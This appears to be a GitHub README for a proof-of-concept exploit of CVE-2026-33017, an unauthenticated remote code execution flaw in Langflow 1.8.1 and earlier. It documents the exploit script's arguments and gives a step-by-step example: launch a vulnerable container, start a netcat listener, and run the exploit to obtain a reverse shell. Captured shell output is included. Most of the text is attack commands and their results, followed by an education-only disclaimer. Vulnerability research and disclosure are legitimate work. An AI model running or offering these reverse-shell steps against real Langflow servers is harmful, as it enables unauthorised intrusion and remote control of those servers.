masterwok/PoC-CVE-2026-33017

# PoC: CVE-2026-33017 Langflow <= 1.8.1 存在远程未认证 RCE 漏洞 ([https://nvd.nist.gov/vuln/detail/CVE-2026-33017](https://nvd.nist.gov/vuln/detail/CVE-2026-33017)) ## 用法 ``` usage: CVE-2026-33017.py [-h] --lhost LHOST --lport LPORT target PoC exploit: CVE-2026-33017 positional arguments: target Target hostname options: -h, --help show this help message and exit --lhost LHOST Reverse shell destination IP address --lport LPORT Reverse shell destination port ``` ## 示例 ``` # 创建 Docker 实例 docker run -d -p 7860:7860 langflowai/langflow:1.8.1 # 启动监听器 nc -lnvp 4444 # 启动利用程序 python3 CVE-2026-33017.py 127.0.0.1 --lhost 192.168.1.17 --lport 4444 # 应在监听器中收到反向 Shell Listening on 0.0.0.0 4444 Connection received on 172.17.0.2 42712 uname -a Linux 9be89ace430c 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64 GNU/Linux ``` 本项目仅供教育和研究用途。 作者不对因使用此代码造成的误用或损害负责。

标签：CISA项目, CVE-2026-33017, Docker, Langflow, Netcat, PoC, Python, RCE, 反向shell, 反序列化, 安全防御评估, 教育用途, 无后门, 暴力破解, 未认证, 漏洞, 编程工具, 远程代码执行, 逆向工具